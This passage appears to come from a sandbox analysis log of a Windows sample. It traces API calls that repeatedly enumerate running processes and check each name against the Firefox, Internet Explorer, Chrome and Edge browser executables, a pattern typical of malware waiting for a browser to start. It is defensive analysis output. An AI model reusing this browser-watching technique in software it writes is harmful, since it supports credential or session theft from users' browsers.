lpString2="firefox.exe") returned -1 [0259.970] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0259.970] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0259.970] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.970] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0259.970] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0259.970] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0259.970] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0259.970] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.970] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0259.971] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0259.971] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0259.971] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0259.971] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.971] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0259.971] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0259.971] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0259.971] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0259.971] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.971] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0259.972] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0259.972] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0259.972] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0259.972] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.972] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0259.972] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0259.973] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0259.973] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0259.973] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.973] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.973] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0259.973] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0259.973] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0259.973] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.973] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.974] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.974] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.974] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.974] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.974] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0259.974] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0259.974] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0259.974] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0259.974] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.974] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.975] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.975] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.975] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.975] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.975] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0259.975] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0259.975] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0259.975] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0259.975] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.975] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.976] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0259.976] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0259.976] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0259.976] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.976] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0259.976] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0259.977] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0259.977] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0259.977] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.977] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.977] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0259.977] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0259.977] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0259.977] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.977] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.978] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0259.978] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0259.978] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0259.978] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.978] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.978] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0259.978] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0259.978] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0259.978] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.978] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.979] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0259.979] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0259.979] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0259.979] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.979] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0259.979] CloseHandle (hObject=0xd4) returned 1 [0259.979] Sleep (dwMilliseconds=0x3e8) [0261.004] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0261.006] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.006] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0261.006] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0261.006] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0261.006] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0261.006] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0261.007] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0261.007] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0261.007] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0261.007] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0261.007] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0261.007] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0261.007] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0261.007] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0261.007] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.007] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.008] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0261.008] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0261.008] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0261.008] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.008] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0261.008] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0261.008] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0261.008] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0261.008] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.008] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.009] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0261.009] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0261.009] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0261.009] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.009] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0261.009] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0261.009] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0261.009] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0261.009] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.009] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0261.010] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0261.010] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0261.010] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0261.010] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.010] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0261.010] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0261.011] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0261.011] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0261.011] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.011] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0261.011] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0261.011] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0261.011] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0261.011] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.011] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.012] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.012] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.012] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.012] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.012] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.012] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.012] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.013] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.013] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.013] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.013] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.013] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.013] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.013] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.013] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.014] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.014] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.014] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.014] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.014] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.014] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.014] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.014] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.014] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.014] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0261.015] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0261.015] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0261.015] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0261.015] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.015] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.015] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.015] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.015] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.015] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.015] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.016] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.016] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.016] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.016] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.016] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0261.016] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0261.017] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0261.017] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0261.017] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0261.017] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0261.017] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0261.017] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0261.017] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0261.017] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.017] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0261.018] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0261.018] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0261.018] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0261.018] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.018] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.018] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0261.018] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0261.018] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0261.018] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.018] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0261.019] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0261.019] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0261.019] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0261.019] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0261.019] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0261.019] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0261.019] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0261.019] lstrcmpiA 